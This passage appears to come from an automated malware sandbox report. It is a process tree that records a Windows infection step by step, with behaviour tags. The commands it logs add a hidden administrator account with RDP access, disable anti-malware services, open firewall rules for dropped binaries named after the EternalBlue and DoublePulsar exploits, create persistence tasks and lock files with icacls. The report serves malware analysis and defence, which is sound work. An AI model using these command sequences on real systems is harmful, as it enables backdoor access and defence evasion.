        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        Checks computer location settings
        
        PID:5756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6124
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5428
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:1168
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5920
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:3328
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:1688
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:6088
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:440
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5196
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5464
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:4532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:3484
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:3312
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:6108
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4860
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2812
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:5768
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4964
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1628
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EDB1.tmp\EDB2.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:4024
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:180
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "sys" /F
        7⤵
        Indicator Removal: Clear Persistence
        
        PID:4092
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "sys" /F
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:5392
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:4924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:1640
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:5308
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4544
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:5300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:5716
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5632
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:4092
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:2928
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:5016
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:1440
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:1468
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:4400
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4192
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:5096
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:4724
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2096
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:5096
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:5104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:2776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1768
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4080
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:4460
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    PID:3992
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2484
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:5060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:744
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:2756
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:232
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:64
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:3476
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:3020
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:3636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3648
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:4824
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:64
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:1240
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:2172
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:4020
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:3128
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:4000
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:2680
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:2648
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:4648
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:3760
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:1352
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4876
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:2072
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:4260
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:4808
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:3308
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:4924
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2620
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4508
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5104
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3448
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1432
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:3832
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3060
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1448
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:800
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3760
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:3448
